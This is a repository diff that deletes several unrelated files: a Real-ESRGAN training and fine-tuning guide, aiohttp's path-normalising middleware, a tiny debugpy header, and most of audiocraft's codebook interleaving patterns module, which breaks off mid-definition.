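元信息文件就是每行一条图像路径（相对于根目录），生成它的思路可以这样示意（仅作演示，实际请使用官方的 scripts/generate_meta_info.py）：

```python
import os

def write_meta_info(img_folder, root, out_txt, exts=(".png", ".jpg", ".jpeg")):
    """把 img_folder 下的图像路径逐行写入 out_txt，路径相对于 root（仅示意）。"""
    with open(out_txt, "w") as f:
        for name in sorted(os.listdir(img_folder)):
            if name.lower().endswith(exts):
                f.write(os.path.relpath(os.path.join(img_folder, name), root) + "\n")
```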
    -你还可以合并多个文件夹的图像路径到一个元信息(meta_info)txt。这是使用示例: - -```bash - python scripts/generate_meta_info.py --input datasets/DF2K/DF2K_HR, datasets/DF2K/DF2K_multiscale --root datasets/DF2K, datasets/DF2K --meta_info datasets/DF2K/meta_info/meta_info_DF2Kmultiscale.txt -``` - -### 训练 Real-ESRNet 模型 - -1. 下载预先训练的模型 [ESRGAN](https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.1/ESRGAN_SRx4_DF2KOST_official-ff704c30.pth),放到 `experiments/pretrained_models`目录下。 - ```bash - wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.1/ESRGAN_SRx4_DF2KOST_official-ff704c30.pth -P experiments/pretrained_models - ``` -2. 相应地修改选项文件 `options/train_realesrnet_x4plus.yml` 中的内容: - ```yml - train: - name: DF2K+OST - type: RealESRGANDataset - dataroot_gt: datasets/DF2K # 修改为你的数据集文件夹根目录 - meta_info: realesrgan/meta_info/meta_info_DF2Kmultiscale+OST_sub.txt # 修改为你自己生成的元信息txt - io_backend: - type: disk - ``` -3. 如果你想在训练过程中执行验证,就取消注释这些内容并进行相应的修改: - ```yml - # 取消注释这些以进行验证 - # val: - # name: validation - # type: PairedImageDataset - # dataroot_gt: path_to_gt - # dataroot_lq: path_to_lq - # io_backend: - # type: disk - - ... - - # 取消注释这些以进行验证 - # 验证设置 - # val: - # val_freq: !!float 5e3 - # save_img: True - - # metrics: - # psnr: # 指标名称,可以是任意的 - # type: calculate_psnr - # crop_border: 4 - # test_y_channel: false - ``` -4. 正式训练之前,你可以用 `--debug` 模式检查是否正常运行。我们用了4个GPU进行训练: - ```bash - CUDA_VISIBLE_DEVICES=0,1,2,3 \ - python -m torch.distributed.launch --nproc_per_node=4 --master_port=4321 realesrgan/train.py -opt options/train_realesrnet_x4plus.yml --launcher pytorch --debug - ``` - - 用 **1个GPU** 训练的 debug 模式示例: - ```bash - python realesrgan/train.py -opt options/train_realesrnet_x4plus.yml --debug - ``` -5. 
The formal training starts. We used 4 GPUs for training. You can also use the `--auto_resume` argument to automatically resume training when necessary.
-   ```bash
-   CUDA_VISIBLE_DEVICES=0,1,2,3 \
-   python -m torch.distributed.launch --nproc_per_node=4 --master_port=4321 realesrgan/train.py -opt options/train_realesrnet_x4plus.yml --launcher pytorch --auto_resume
-   ```
-
-   Training with **1 GPU**:
-   ```bash
-   python realesrgan/train.py -opt options/train_realesrnet_x4plus.yml --auto_resume
-   ```
-
-### Train the Real-ESRGAN model
-
-1. After training the Real-ESRNet model, you now have the file `experiments/train_RealESRNetx4plus_1000k_B12G4_fromESRGAN/model/net_g_1000000.pth`. If you need to point the pre-training path to another file, modify the value of `pretrain_network_g` in the option file `train_realesrgan_x4plus.yml`.
-1. Modify the contents of the option file `train_realesrgan_x4plus.yml`. Most modifications are similar to those mentioned in the previous section.
-1. Before the formal training, you can check in `--debug` mode whether everything runs correctly. We used 4 GPUs for training:
-   ```bash
-   CUDA_VISIBLE_DEVICES=0,1,2,3 \
-   python -m torch.distributed.launch --nproc_per_node=4 --master_port=4321 realesrgan/train.py -opt options/train_realesrgan_x4plus.yml --launcher pytorch --debug
-   ```
-
-   Example of training in debug mode with **1 GPU**:
-   ```bash
-   python realesrgan/train.py -opt options/train_realesrgan_x4plus.yml --debug
-   ```
-1. The formal training starts. We use 4 GPUs for training. You can also use the `--auto_resume` argument to automatically resume training when necessary.
-   ```bash
-   CUDA_VISIBLE_DEVICES=0,1,2,3 \
-   python -m torch.distributed.launch --nproc_per_node=4 --master_port=4321 realesrgan/train.py -opt options/train_realesrnet_x4plus.yml --launcher pytorch --auto_resume
-   ```
-
-   Training with **1 GPU**:
-   ```bash
-   python realesrgan/train.py -opt options/train_realesrnet_x4plus.yml --auto_resume
-   ```
-
-## Fine-tune Real-ESRGAN on your own dataset
-
-You can fine-tune Real-ESRGAN on your own dataset. Generally, the fine-tuning process can be divided into two types:
-
-1. [Generate degraded images on the fly](#generate-degraded-images-on-the-fly)
-2. [Use your own **paired** data](#use-your-own-paired-data)
-
-### Generate degraded images on the fly
-
-Only high-resolution images are required. During training, low-quality images are generated with the degradation model described in Real-ESRGAN.
-
-**1. Prepare the dataset**
-
-For the full information, please refer to [this section](#准备数据集).
-
-**2. 
Download pre-trained models**
-
-Download the pre-trained models into the `experiments/pretrained_models` directory.
-
-- *RealESRGAN_x4plus.pth*:
-  ```bash
-  wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.0/RealESRGAN_x4plus.pth -P experiments/pretrained_models
-  ```
-
-- *RealESRGAN_x4plus_netD.pth*:
-  ```bash
-  wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.2.3/RealESRGAN_x4plus_netD.pth -P experiments/pretrained_models
-  ```
-
-**3. Fine-tune**
-
-Modify the option file [options/finetune_realesrgan_x4plus.yml](options/finetune_realesrgan_x4plus.yml), especially the `datasets` part:
-
-```yml
-train:
-    name: DF2K+OST
-    type: RealESRGANDataset
-    dataroot_gt: datasets/DF2K  # modify to the root path of your dataset folder
-    meta_info: realesrgan/meta_info/meta_info_DF2Kmultiscale+OST_sub.txt  # modify to your own generated meta-info txt
-    io_backend:
-        type: disk
-```
-
-We use 4 GPUs for training. You can also use the `--auto_resume` argument to automatically resume training when necessary.
-
-```bash
-CUDA_VISIBLE_DEVICES=0,1,2,3 \
-python -m torch.distributed.launch --nproc_per_node=4 --master_port=4321 realesrgan/train.py -opt options/finetune_realesrgan_x4plus.yml --launcher pytorch --auto_resume
-```
-
-Training with **1 GPU**:
-```bash
-python realesrgan/train.py -opt options/finetune_realesrgan_x4plus.yml --auto_resume
-```
-
-### Use your own paired data
-
-You can also fine-tune RealESRGAN with your own paired data. This process is more similar to fine-tuning ESRGAN.
-
-**1. Prepare the dataset**
-
-Assume that you already have two folders:
-
-- **gt folder** (ground truth, high-resolution images): *datasets/DF2K/DIV2K_train_HR_sub*
-- **lq folder** (low quality, low-resolution images): *datasets/DF2K/DIV2K_train_LR_bicubic_X4_sub*
-
-Then you can use the script [scripts/generate_meta_info_pairdata.py](scripts/generate_meta_info_pairdata.py) to generate the meta-info txt file.
-
-```bash
-python scripts/generate_meta_info_pairdata.py --input datasets/DF2K/DIV2K_train_HR_sub datasets/DF2K/DIV2K_train_LR_bicubic_X4_sub --meta_info datasets/DF2K/meta_info/meta_info_DIV2K_sub_pair.txt
-```
-
-**2. 
Download pre-trained models**
-
-Download the pre-trained models into the `experiments/pretrained_models` directory.
-
-- *RealESRGAN_x4plus.pth*:
-  ```bash
-  wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.1.0/RealESRGAN_x4plus.pth -P experiments/pretrained_models
-  ```
-
-- *RealESRGAN_x4plus_netD.pth*:
-  ```bash
-  wget https://github.com/xinntao/Real-ESRGAN/releases/download/v0.2.2.3/RealESRGAN_x4plus_netD.pth -P experiments/pretrained_models
-  ```
-
-**3. Fine-tune**
-
-Modify the option file [options/finetune_realesrgan_x4plus_pairdata.yml](options/finetune_realesrgan_x4plus_pairdata.yml), especially the `datasets` part:
-
-```yml
-train:
-    name: DIV2K
-    type: RealESRGANPairedDataset
-    dataroot_gt: datasets/DF2K  # modify to the root path of your gt folder
-    dataroot_lq: datasets/DF2K  # modify to the root path of your lq folder
-    meta_info: datasets/DF2K/meta_info/meta_info_DIV2K_sub_pair.txt  # modify to your own generated meta-info txt
-    io_backend:
-        type: disk
-```
-
-We use 4 GPUs for training. You can also use the `--auto_resume` argument to automatically resume training when necessary.
-
-```bash
-CUDA_VISIBLE_DEVICES=0,1,2,3 \
-python -m torch.distributed.launch --nproc_per_node=4 --master_port=4321 realesrgan/train.py -opt options/finetune_realesrgan_x4plus_pairdata.yml --launcher pytorch --auto_resume
-```
-
-Training with **1 GPU**:
-```bash
-python realesrgan/train.py -opt options/finetune_realesrgan_x4plus_pairdata.yml --auto_resume
-```
diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/aiohttp/web_middlewares.py b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/aiohttp/web_middlewares.py
deleted file mode 100644
index fabcc449a2107211fd99cd59f576a2d855d0e042..0000000000000000000000000000000000000000
--- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/aiohttp/web_middlewares.py
+++ /dev/null
@@ -1,119 +0,0 @@
-import re
-from typing import TYPE_CHECKING, Awaitable, Callable, Tuple, Type, TypeVar
-
-from .typedefs import Handler
-from .web_exceptions import HTTPPermanentRedirect, _HTTPMove
-from .web_request import Request
-from .web_response import StreamResponse
-from .web_urldispatcher import SystemRoute
-
-__all__ = (
"middleware", - "normalize_path_middleware", -) - -if TYPE_CHECKING: # pragma: no cover - from .web_app import Application - -_Func = TypeVar("_Func") - - -async def _check_request_resolves(request: Request, path: str) -> Tuple[bool, Request]: - alt_request = request.clone(rel_url=path) - - match_info = await request.app.router.resolve(alt_request) - alt_request._match_info = match_info - - if match_info.http_exception is None: - return True, alt_request - - return False, request - - -def middleware(f: _Func) -> _Func: - f.__middleware_version__ = 1 # type: ignore[attr-defined] - return f - - -_Middleware = Callable[[Request, Handler], Awaitable[StreamResponse]] - - -def normalize_path_middleware( - *, - append_slash: bool = True, - remove_slash: bool = False, - merge_slashes: bool = True, - redirect_class: Type[_HTTPMove] = HTTPPermanentRedirect, -) -> _Middleware: - """Factory for producing a middleware that normalizes the path of a request. - - Normalizing means: - - Add or remove a trailing slash to the path. - - Double slashes are replaced by one. - - The middleware returns as soon as it finds a path that resolves - correctly. The order if both merge and append/remove are enabled is - 1) merge slashes - 2) append/remove slash - 3) both merge slashes and append/remove slash. - If the path resolves with at least one of those conditions, it will - redirect to the new path. - - Only one of `append_slash` and `remove_slash` can be enabled. If both - are `True` the factory will raise an assertion error - - If `append_slash` is `True` the middleware will append a slash when - needed. If a resource is defined with trailing slash and the request - comes without it, it will append it automatically. - - If `remove_slash` is `True`, `append_slash` must be `False`. When enabled - the middleware will remove trailing slashes and redirect if the resource - is defined - - If merge_slashes is True, merge multiple consecutive slashes in the - path into one. 
- """ - correct_configuration = not (append_slash and remove_slash) - assert correct_configuration, "Cannot both remove and append slash" - - @middleware - async def impl(request: Request, handler: Handler) -> StreamResponse: - if isinstance(request.match_info.route, SystemRoute): - paths_to_check = [] - if "?" in request.raw_path: - path, query = request.raw_path.split("?", 1) - query = "?" + query - else: - query = "" - path = request.raw_path - - if merge_slashes: - paths_to_check.append(re.sub("//+", "/", path)) - if append_slash and not request.path.endswith("/"): - paths_to_check.append(path + "/") - if remove_slash and request.path.endswith("/"): - paths_to_check.append(path[:-1]) - if merge_slashes and append_slash: - paths_to_check.append(re.sub("//+", "/", path + "/")) - if merge_slashes and remove_slash: - merged_slashes = re.sub("//+", "/", path) - paths_to_check.append(merged_slashes[:-1]) - - for path in paths_to_check: - path = re.sub("^//+", "/", path) # SECURITY: GHSA-v6wp-4m6f-gcjg - resolves, request = await _check_request_resolves(request, path) - if resolves: - raise redirect_class(request.raw_path + query) - - return await handler(request) - - return impl - - -def _fix_request_current_app(app: "Application") -> _Middleware: - @middleware - async def impl(request: Request, handler: Handler) -> StreamResponse: - with request.match_info.set_current_app(app): - return await handler(request) - - return impl diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/debugpy/_vendored/pydevd/_pydevd_frame_eval/release_mem.h b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/debugpy/_vendored/pydevd/_pydevd_frame_eval/release_mem.h deleted file mode 100644 index cc6e3d9269668c0e6ab1ba656cd3b254c6106804..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/debugpy/_vendored/pydevd/_pydevd_frame_eval/release_mem.h +++ /dev/null @@ -1,5 +0,0 @@ -#include "Python.h" - -void 
release_co_extra(void *obj) { - Py_XDECREF(obj); -} diff --git a/spaces/Suniilkumaar/MusicGen-updated/audiocraft/modules/codebooks_patterns.py b/spaces/Suniilkumaar/MusicGen-updated/audiocraft/modules/codebooks_patterns.py deleted file mode 100644 index c5b35cbea8cff84aa56116dbdd860fc72a913a13..0000000000000000000000000000000000000000 --- a/spaces/Suniilkumaar/MusicGen-updated/audiocraft/modules/codebooks_patterns.py +++ /dev/null @@ -1,539 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -from collections import namedtuple -from dataclasses import dataclass -from functools import lru_cache -import logging -import typing as tp - -from abc import ABC, abstractmethod -import torch - -LayoutCoord = namedtuple('LayoutCoord', ['t', 'q']) # (timestep, codebook index) -PatternLayout = tp.List[tp.List[LayoutCoord]] # Sequence of coordinates -logger = logging.getLogger(__name__) - - -@dataclass -class Pattern: - """Base implementation of a pattern over a sequence with multiple codebooks. - - The codebook pattern consists in a layout, defining for each sequence step - the list of coordinates of each codebook timestep in the resulting interleaved sequence. - The first item of the pattern is always an empty list in order to properly insert a special token - to start with. For convenience, we also keep track of ``n_q`` the number of codebooks used for the pattern - and ``timesteps`` the number of timesteps corresponding to the original sequence. 
-
-    The pattern provides convenient methods to build and revert interleaved sequences from it:
-    ``build_pattern_sequence`` maps a given dense input tensor of a multi-codebook sequence from [B, K, T]
-    to the interleaved sequence of shape [B, K, S] applying the pattern, with B being the batch size,
-    K being the number of codebooks, T the number of original timesteps and S the number of sequence steps
-    for the output sequence. The unfilled positions are replaced with a special token and the built sequence
-    is returned along with a mask indicating valid tokens.
-    ``revert_pattern_sequence`` maps back an interleaved sequence of shape [B, K, S] to the original alignment
-    of codebooks across timesteps to an output tensor of shape [B, K, T], using again a special token and a mask
-    to fill and specify invalid positions if needed.
-    See the dedicated methods for more details.
-    """
-    # Pattern layout, for each sequence step, we have a list of coordinates
-    # corresponding to the original codebook timestep and position.
-    # The first list is always an empty list in order to properly insert
-    # a special token to start with.
-    layout: PatternLayout
-    timesteps: int
-    n_q: int
-
-    def __post_init__(self):
-        assert len(self.layout) > 0
-        assert self.layout[0] == []
-        self._validate_layout()
-        self._build_reverted_sequence_scatter_indexes = lru_cache(100)(self._build_reverted_sequence_scatter_indexes)
-        self._build_pattern_sequence_scatter_indexes = lru_cache(100)(self._build_pattern_sequence_scatter_indexes)
-        logger.info("New pattern, time steps: %d, sequence steps: %d", self.timesteps, len(self.layout))
-
-    def _validate_layout(self):
-        """Runs checks on the layout to ensure a valid pattern is defined.
- A pattern is considered invalid if: - - Multiple timesteps for a same codebook are defined in the same sequence step - - The timesteps for a given codebook are not in ascending order as we advance in the sequence - (this would mean that we have future timesteps before past timesteps). - """ - q_timesteps = {q: 0 for q in range(self.n_q)} - for s, seq_coords in enumerate(self.layout): - if len(seq_coords) > 0: - qs = set() - for coord in seq_coords: - qs.add(coord.q) - last_q_timestep = q_timesteps[coord.q] - assert coord.t >= last_q_timestep, \ - f"Past timesteps are found in the sequence for codebook = {coord.q} at step {s}" - q_timesteps[coord.q] = coord.t - # each sequence step contains at max 1 coordinate per codebook - assert len(qs) == len(seq_coords), \ - f"Multiple entries for a same codebook are found at step {s}" - - @property - def num_sequence_steps(self): - return len(self.layout) - 1 - - @property - def max_delay(self): - max_t_in_seq_coords = 0 - for seq_coords in self.layout[1:]: - for coords in seq_coords: - max_t_in_seq_coords = max(max_t_in_seq_coords, coords.t + 1) - return max_t_in_seq_coords - self.timesteps - - @property - def valid_layout(self): - valid_step = len(self.layout) - self.max_delay - return self.layout[:valid_step] - - def get_sequence_coords_with_timestep(self, t: int, q: tp.Optional[int] = None): - """Get codebook coordinates in the layout that corresponds to the specified timestep t - and optionally to the codebook q. Coordinates are returned as a tuple with the sequence step - and the actual codebook coordinates. 
- """ - assert t <= self.timesteps, "provided timesteps is greater than the pattern's number of timesteps" - if q is not None: - assert q <= self.n_q, "provided number of codebooks is greater than the pattern's number of codebooks" - coords = [] - for s, seq_codes in enumerate(self.layout): - for code in seq_codes: - if code.t == t and (q is None or code.q == q): - coords.append((s, code)) - return coords - - def get_steps_with_timestep(self, t: int, q: tp.Optional[int] = None) -> tp.List[int]: - return [step for step, coords in self.get_sequence_coords_with_timestep(t, q)] - - def get_first_step_with_timesteps(self, t: int, q: tp.Optional[int] = None) -> tp.Optional[int]: - steps_with_timesteps = self.get_steps_with_timestep(t, q) - return steps_with_timesteps[0] if len(steps_with_timesteps) > 0 else None - - def _build_pattern_sequence_scatter_indexes(self, timesteps: int, n_q: int, keep_only_valid_steps: bool, - device: tp.Union[torch.device, str] = 'cpu'): - """Build scatter indexes corresponding to the pattern, up to the provided sequence_steps. - - Args: - timesteps (int): Maximum number of timesteps steps to consider. - keep_only_valid_steps (bool): Restrict the pattern layout to match only valid steps. - device (Union[torch.device, str]): Device for created tensors. - Returns: - indexes (torch.Tensor): Indexes corresponding to the sequence, of shape [K, S]. - mask (torch.Tensor): Mask corresponding to indexes that matches valid indexes, of shape [K, S]. 
- """ - assert n_q == self.n_q, f"invalid number of codebooks for the sequence and the pattern: {n_q} != {self.n_q}" - assert timesteps <= self.timesteps, "invalid number of timesteps used to build the sequence from the pattern" - # use the proper layout based on whether we limit ourselves to valid steps only or not, - # note that using the valid_layout will result in a truncated sequence up to the valid steps - ref_layout = self.valid_layout if keep_only_valid_steps else self.layout - # single item indexing being super slow with pytorch vs. numpy, so we use numpy here - indexes = torch.zeros(n_q, len(ref_layout), dtype=torch.long).numpy() - mask = torch.zeros(n_q, len(ref_layout), dtype=torch.bool).numpy() - # fill indexes with last sequence step value that will correspond to our special token - # the last value is n_q * timesteps as we have flattened z and append special token as the last token - # which will correspond to the index: n_q * timesteps - indexes[:] = n_q * timesteps - # iterate over the pattern and fill scattered indexes and mask - for s, sequence_coords in enumerate(ref_layout): - for coords in sequence_coords: - if coords.t < timesteps: - indexes[coords.q, s] = coords.t + coords.q * timesteps - mask[coords.q, s] = 1 - indexes = torch.from_numpy(indexes).to(device) - mask = torch.from_numpy(mask).to(device) - return indexes, mask - - def build_pattern_sequence(self, z: torch.Tensor, special_token: int, keep_only_valid_steps: bool = False): - """Build sequence corresponding to the pattern from the input tensor z. - The sequence is built using up to sequence_steps if specified, and non-pattern - coordinates are filled with the special token. - - Args: - z (torch.Tensor): Input tensor of multi-codebooks sequence, of shape [B, K, T]. - special_token (int): Special token used to fill non-pattern coordinates in the new sequence. - keep_only_valid_steps (bool): Build a sequence from the pattern up to valid (= fully defined) steps. 
- Steps that are beyond valid steps will be replaced by the special_token in that case. - Returns: - values (torch.Tensor): Interleaved sequence matching the pattern, of shape [B, K, S] with S - corresponding either to the sequence_steps if provided, otherwise to the length of the pattern. - indexes (torch.Tensor): Indexes corresponding to the interleaved sequence, of shape [K, S]. - mask (torch.Tensor): Mask corresponding to indexes that matches valid indexes of shape [K, S]. - """ - B, K, T = z.shape - indexes, mask = self._build_pattern_sequence_scatter_indexes( - T, K, keep_only_valid_steps=keep_only_valid_steps, device=str(z.device) - ) - z = z.view(B, -1) - # we append the special token as the last index of our flattened z tensor - z = torch.cat([z, torch.zeros_like(z[:, :1]) + special_token], dim=1) - values = z[:, indexes.view(-1)] - values = values.view(B, K, indexes.shape[-1]) - return values, indexes, mask - - def _build_reverted_sequence_scatter_indexes(self, sequence_steps: int, n_q: int, - keep_only_valid_steps: bool = False, - is_model_output: bool = False, - device: tp.Union[torch.device, str] = 'cpu'): - """Builds scatter indexes required to retrieve the original multi-codebook sequence - from interleaving pattern. - - Args: - sequence_steps (int): Sequence steps. - n_q (int): Number of codebooks. - keep_only_valid_steps (bool): Build a sequence from the pattern up to valid (= fully defined) steps. - Steps that are beyond valid steps will be replaced by the special_token in that case. - is_model_output (bool): Whether to keep the sequence item corresponding to initial special token or not. - device (Union[torch.device, str]): Device for created tensors. - Returns: - torch.Tensor: Indexes for reconstructing the output, of shape [K, T]. - mask (torch.Tensor): Mask corresponding to indexes that matches valid indexes of shape [K, T]. 
- """ - ref_layout = self.valid_layout if keep_only_valid_steps else self.layout - # TODO(jade): Do we want to further truncate to only valid timesteps here as well? - timesteps = self.timesteps - assert n_q == self.n_q, f"invalid number of codebooks for the sequence and the pattern: {n_q} != {self.n_q}" - assert sequence_steps <= len(ref_layout), \ - f"sequence to revert is longer than the defined pattern: {sequence_steps} > {len(ref_layout)}" - - # ensure we take the appropriate indexes to keep the model output from the first special token as well - if is_model_output: - ref_layout = ref_layout[1:] - - # single item indexing being super slow with pytorch vs. numpy, so we use numpy here - indexes = torch.zeros(n_q, timesteps, dtype=torch.long).numpy() - mask = torch.zeros(n_q, timesteps, dtype=torch.bool).numpy() - # fill indexes with last sequence step value that will correspond to our special token - indexes[:] = n_q * sequence_steps - for s, sequence_codes in enumerate(ref_layout): - if s < sequence_steps: - for code in sequence_codes: - if code.t < timesteps: - indexes[code.q, code.t] = s + code.q * sequence_steps - mask[code.q, code.t] = 1 - indexes = torch.from_numpy(indexes).to(device) - mask = torch.from_numpy(mask).to(device) - return indexes, mask - - def revert_pattern_sequence(self, s: torch.Tensor, special_token: int, keep_only_valid_steps: bool = False): - """Revert a sequence built from the pattern back to the original multi-codebook sequence without interleaving. - The sequence is reverted using up to timesteps if specified, and non-pattern coordinates - are filled with the special token. - - Args: - s (torch.Tensor): Interleaved sequence tensor obtained from the pattern, of shape [B, K, S]. - special_token (int or float): Special token used to fill non-pattern coordinates in the new sequence. 
- Returns: - values (torch.Tensor): Interleaved sequence matching the pattern, of shape [B, K, T] with T - corresponding either to the timesteps if provided, or the total timesteps in pattern otherwise. - indexes (torch.Tensor): Indexes corresponding to the interleaved sequence, of shape [K, T]. - mask (torch.Tensor): Mask corresponding to indexes that matches valid indexes of shape [K, T]. - """ - B, K, S = s.shape - indexes, mask = self._build_reverted_sequence_scatter_indexes( - S, K, keep_only_valid_steps, is_model_output=False, device=str(s.device) - ) - s = s.view(B, -1) - # we append the special token as the last index of our flattened z tensor - s = torch.cat([s, torch.zeros_like(s[:, :1]) + special_token], dim=1) - values = s[:, indexes.view(-1)] - values = values.view(B, K, indexes.shape[-1]) - return values, indexes, mask - - def revert_pattern_logits(self, logits: torch.Tensor, special_token: float, keep_only_valid_steps: bool = False): - """Revert model logits obtained on a sequence built from the pattern - back to a tensor matching the original sequence. - - This method is similar to ``revert_pattern_sequence`` with the following specificities: - 1. It is designed to work with the extra cardinality dimension - 2. 
We return the logits for the first sequence item that matches the special_token and - which matching target in the original sequence is the first item of the sequence, - while we skip the last logits as there is no matching target - """ - B, card, K, S = logits.shape - indexes, mask = self._build_reverted_sequence_scatter_indexes( - S, K, keep_only_valid_steps, is_model_output=True, device=logits.device - ) - logits = logits.reshape(B, card, -1) - # we append the special token as the last index of our flattened z tensor - logits = torch.cat([logits, torch.zeros_like(logits[:, :, :1]) + special_token], dim=-1) # [B, card, K x S] - values = logits[:, :, indexes.view(-1)] - values = values.view(B, card, K, indexes.shape[-1]) - return values, indexes, mask - - -class CodebooksPatternProvider(ABC): - """Abstraction around providing pattern for interleaving codebooks. - - The CodebooksPatternProvider abstraction allows to implement various strategies to - define interleaving pattern of sequences composed of multiple codebooks. For a given - number of codebooks `n_q`, the pattern provider can generate a specified pattern - corresponding to a sequence of `T` timesteps with `n_q` parallel codebooks. This pattern - can be used to construct a new sequence from the original codes respecting the specified - pattern. The pattern is defined as a list of list of code coordinates, code coordinate - being a tuple with the original timestep and codebook to build the new sequence. - Note that all patterns must start with an empty list that is then used to insert a first - sequence step of special tokens in the newly generated sequence. - - Args: - n_q (int): number of codebooks. - cached (bool): if True, patterns for a given length are cached. In general - that should be true for efficiency reason to avoid synchronization points. 
- """ - def __init__(self, n_q: int, cached: bool = True): - assert n_q > 0 - self.n_q = n_q - self.get_pattern = lru_cache(100)(self.get_pattern) # type: ignore - - @abstractmethod - def get_pattern(self, timesteps: int) -> Pattern: - """Builds pattern with specific interleaving between codebooks. - - Args: - timesteps (int): Total numer of timesteps. - """ - raise NotImplementedError() - - -class DelayedPatternProvider(CodebooksPatternProvider): - """Provider for delayed pattern across delayed codebooks. - Codebooks are delayed in the sequence and sequence steps will contain codebooks - from different timesteps. - - Example: - Taking timesteps=4 and n_q=3, delays=None, the multi-codebook sequence: - [[1, 2, 3, 4], - [1, 2, 3, 4], - [1, 2, 3, 4]] - The resulting sequence obtained from the returned pattern is: - [[S, 1, 2, 3, 4], - [S, S, 1, 2, 3], - [S, S, S, 1, 2]] - (with S being a special token) - - Args: - n_q (int): Number of codebooks. - delays (Optional[List[int]]): Delay for each of the codebooks. - If delays not defined, each codebook is delayed by 1 compared to the previous one. - flatten_first (int): Flatten the first N timesteps. - empty_initial (int): Prepend with N empty list of coordinates. 
- """ - def __init__(self, n_q: int, delays: tp.Optional[tp.List[int]] = None, - flatten_first: int = 0, empty_initial: int = 0): - super().__init__(n_q) - if delays is None: - delays = list(range(n_q)) - self.delays = delays - self.flatten_first = flatten_first - self.empty_initial = empty_initial - assert len(self.delays) == self.n_q - assert sorted(self.delays) == self.delays - - def get_pattern(self, timesteps: int) -> Pattern: - out: PatternLayout = [[]] - max_delay = max(self.delays) - if self.empty_initial: - out += [[] for _ in range(self.empty_initial)] - if self.flatten_first: - for t in range(min(timesteps, self.flatten_first)): - for q in range(self.n_q): - out.append([LayoutCoord(t, q)]) - for t in range(self.flatten_first, timesteps + max_delay): - v = [] - for q, delay in enumerate(self.delays): - t_for_q = t - delay - if t_for_q >= self.flatten_first: - v.append(LayoutCoord(t_for_q, q)) - out.append(v) - return Pattern(out, n_q=self.n_q, timesteps=timesteps) - - -class ParallelPatternProvider(DelayedPatternProvider): - """Provider for parallel pattern across codebooks. - This pattern provider is a special case of the delayed pattern with actually no delay, - hence delays=repeat(0, n_q). - - Args: - n_q (int): Number of codebooks. - """ - def __init__(self, n_q: int): - super().__init__(n_q, [0] * n_q) - - -class UnrolledPatternProvider(CodebooksPatternProvider): - """Provider for unrolling codebooks pattern. - This pattern provider enables to represent the codebook flattened completely or only to some extend - while also specifying a given delay between the flattened codebooks representation, allowing to - unroll the codebooks in the sequence. - - Example: - 1. Flattening of the codebooks. 
- By default, the pattern provider will fully flatten the codebooks such as flattening=range(n_q), - taking n_q = 3 and timesteps = 4: - [[1, 2, 3, 4], - [1, 2, 3, 4], - [1, 2, 3, 4]] - will result into: - [[S, S, 1, S, S, 2, S, S, 3, S, S, 4], - [S, 1, S, S, 2, S, S, 3, S, S, 4, S], - [1, S, S, 2, S, S, 3, S, S, 4, S, S]] - 2. Partial flattening of the codebooks. The ``flattening`` parameter allows to specify the inner step - for each of the codebook, allowing to define which codebook to flatten (or keep in parallel), for example - taking n_q = 3, timesteps = 4 and flattening = [0, 1, 1]: - [[1, 2, 3, 4], - [1, 2, 3, 4], - [1, 2, 3, 4]] - will result into: - [[S, 1, S, S, 2, S, S, 3, S, S, 4, S], - [S, 1, S, S, 2, S, S, 3, S, S, 4, S], - [1, S, S, 2, S, S, 3, S, S, 4, S, S]] - 3. Flattening with delay. The ``delay`` parameter allows to further unroll the sequence of codebooks - allowing to specify the delay per codebook. Note that the delay between codebooks flattened to the - same inner timestep should be coherent. For example, taking n_q = 3, timesteps = 4, flattening = [0, 1, 1] - and delays = [0, 3, 3]: - [[1, 2, 3, 4], - [1, 2, 3, 4], - [1, 2, 3, 4]] - will result into: - [[S, S, S, 1, S, 2, S, 3, S, 4], - [S, S, S, 1, S, 2, S, 3, S, 4], - [1, 2, 3, S, 4, S, 5, S, 6, S]] - - Args: - n_q (int): Number of codebooks. - flattening (Optional[List[int]]): Flattening schema over the codebooks. If not defined, - the codebooks will be flattened to 1 codebook per step, meaning that the sequence will - have n_q extra steps for each timestep. - delays (Optional[List[int]]): Delay for each of the codebooks. If not defined, - no delay is added and therefore will default to [0] * ``n_q``. - Note that two codebooks that will be flattened to the same inner step - should have the same delay, otherwise the pattern is considered as invalid. 
- """ - FlattenedCodebook = namedtuple('FlattenedCodebook', ['codebooks', 'delay']) - - def __init__(self, n_q: int, flattening: tp.Optional[tp.List[int]] = None, - delays: tp.Optional[tp.List[int]] = None): - super().__init__(n_q) - if flattening is None: - flattening = list(range(n_q)) - if delays is None: - delays = [0] * n_q - assert len(flattening) == n_q - assert len(delays) == n_q - assert sorted(flattening) == flattening - assert sorted(delays) == delays - self._flattened_codebooks = self._build_flattened_codebooks(delays, flattening) - self.max_delay = max(delays) - - def _build_flattened_codebooks(self, delays: tp.List[int], flattening: tp.List[int]): - """Build a flattened codebooks representation as a dictionary of inner step - and the actual codebook indices corresponding to the flattened codebook. For convenience, we - also store the delay associated to the flattened codebook to avoid maintaining an extra mapping. - """ - flattened_codebooks: dict = {} - for q, (inner_step, delay) in enumerate(zip(flattening, delays)): - if inner_step not in flattened_codebooks: - flat_codebook = UnrolledPatternProvider.FlattenedCodebook(codebooks=[q], delay=delay) - else: - flat_codebook = flattened_codebooks[inner_step] - assert flat_codebook.delay == delay, ( - "Delay and flattening between codebooks is inconsistent: ", - "two codebooks flattened to the same position should have the same delay." - ) - flat_codebook.codebooks.append(q) - flattened_codebooks[inner_step] = flat_codebook - return flattened_codebooks - - @property - def _num_inner_steps(self): - """Number of inner steps to unroll between timesteps in order to flatten the codebooks. - """ - return max([inner_step for inner_step in self._flattened_codebooks.keys()]) + 1 - - def num_virtual_steps(self, timesteps: int) -> int: - return timesteps * self._num_inner_steps + 1 - - def 